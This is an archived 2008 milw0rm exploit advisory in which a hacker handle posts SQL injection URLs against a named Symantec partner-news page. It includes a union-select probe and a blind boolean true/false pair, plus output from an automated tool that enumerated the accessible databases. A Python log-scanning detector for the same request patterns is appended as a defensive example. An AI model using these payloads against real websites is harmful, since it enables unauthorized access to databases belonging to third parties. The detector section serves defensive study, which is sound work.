CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ EZINE ]

Author    : CraCkEr
Website   : symantec.com
Vuln Type : Blind SQL Injection
Method    : GET
Critical  : High
Impact    : Database access

Famous Sites Can Be Also Vulned

DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Exploit URLs

[+] Remote SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--

[+] Blind SQL
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0

[+] Text Change
Bedriftsfordelene ved sosiale nettverk

[+] Attack Results
[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 18:00:05
[+] Number of Rows: 85
[-] 00:58:04
[-] Total URL Requests 10602
[-] Done

Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL.

© CraCkEr 2008

# milw0rm.com [2008-10-07]
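
A defender's view of the request pattern listed under the exploit URLs, as an added example that is not part of the original advisory: it scans web access-log entries for the same parameter receiving both a true and a false boolean condition (the `and 1=1` / `and 1=0` pair) or a `union select` payload. The log tuple format, the client addresses and all function names are assumptions made for illustration; the sample entries are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log entries (client IP, request target); not from the advisory.
SAMPLE_LOG = [
    ("203.0.113.7", "/2008/03/index.php?p=lp&l=1"),
    ("203.0.113.7", "/2008/03/index.php?p=lp&l=1%20and%201=1"),
    ("203.0.113.7", "/2008/03/index.php?p=lp&l=1%20and%201=0"),
    ("203.0.113.7", "/2008/03/index.php?p=lp&l=-1%20union%20select%201,2,3--"),
    ("198.51.100.20", "/2008/03/index.php?p=lp&l=4"),
]

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# Boolean probe: "and|or <int>=<int>" appended to the end of a parameter value.
BOOL_RE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)\s*$", re.I)

def classify(value):
    """Return 'union', 'bool_true', 'bool_false' or None for one decoded value."""
    if UNION_RE.search(value):
        return "union"
    m = BOOL_RE.search(value)
    if m:
        return "bool_true" if int(m.group(1)) == int(m.group(2)) else "bool_false"
    return None

def scan(log):
    """Map (client, path, parameter) to the set of probe kinds seen for it."""
    seen = defaultdict(set)
    for client, target in log:
        parts = urlsplit(target)
        # parse_qsl percent-decodes and splits each pair on the first '=' only.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                seen[(client, parts.path, name)].add(kind)
    return seen

def alerts(log):
    """Flag a parameter when one client sent a union probe or a true/false pair."""
    out = []
    for key, kinds in sorted(scan(log).items()):
        if "union" in kinds or {"bool_true", "bool_false"} <= kinds:
            out.append((key, sorted(kinds)))
    return out

if __name__ == "__main__":
    for (client, path, param), kinds in alerts(SAMPLE_LOG):
        print(f"{client} probed {path} parameter '{param}': {', '.join(kinds)}")
```

A single boolean condition on its own is not flagged; requiring the true/false pair from the same client on the same parameter keeps false positives down on search-style parameters.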